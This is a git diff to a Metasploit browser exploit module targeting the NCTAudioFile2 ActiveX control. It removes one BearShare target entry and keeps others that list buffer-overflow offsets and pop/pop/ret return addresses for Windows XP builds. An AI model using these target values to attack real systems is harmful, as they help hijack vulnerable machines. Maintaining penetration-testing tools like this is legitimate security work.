diff --git a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb index 8e6e3b1ffb..bae019d0e5 100644 --- a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb +++ b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb @@ -61,8 +61,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows XP SP2 Pro English', { 'Offset' => 4100, 'Ret' => 0x746C15A9 } ], # p/p/r in msls31.dll [ 'Windows XP SP3 Pro English', { 'Offset' => 4100, 'Ret' => 0x10017C8A } ], # p/p/r in NCTAudioFile2.dll v2.6.1.643 - # BearShare 6.0.2.26789 (NCTAudioFile2.dll v2.5.7.514) - [ 'Windows XP SP2 Pro English', { 'Offset' => 4116, 'Ret' => 0x7c81518B } ], # ?? ], 'DisclosureDate' => 'Jan 24 2007', 'DefaultTarget' => 0))